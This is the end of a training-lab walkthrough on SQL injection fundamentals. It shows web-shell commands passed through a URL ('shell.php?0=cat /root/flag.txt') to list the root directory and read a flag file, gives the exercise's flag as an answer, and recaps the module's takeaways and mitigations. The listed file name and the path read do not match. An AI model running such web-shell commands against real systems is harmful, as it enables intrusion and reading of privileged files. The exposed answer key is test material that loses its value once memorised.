  • shell.php

List files in the /root directory http://<Target_IP>/dashboard/shell.php?0=ls /

The result shows the file flag_cae1dadcd174.txt is located in the root directory (/)

View the contents of the flag file http://<Target_IP>/dashboard/shell.php?0=cat /root/flag.txt

The result shows the flag 528d6d9cedc2c7aab146ef226e918396

What is the flag in the / root directory of the file system

Answer: 528d6d9cedc2c7aab146ef226e918396


In this module, we walked through an overview of database management systems (DBMS) and structured query language (SQL).
We built our own SQL queries from the ground up, looked at union-based SQL injection flaws, and discusses mitigations that can be taken to defend against SQL injection.

Module Key Takeaways

An understanding of DBMS and SQL
The ability to craft and interpret SQL queries
Exploiting SQL injections to subvert the web app logic
Exploiting union-based SQL injection vulnerabilities
Leveraging SQL injection for operating system interaction
Mitigations to prevent SQL injection.

Hope you found this SQL Injection Fundamentals walkthrough helpful! Keep pushing forward and stay curious as you explore more advanced cybersecurity concepts. Happy hacking!




Written by IritT

In the world of cybersecurity, the strongest defense is knowledge. Hack the mind, secure the future.

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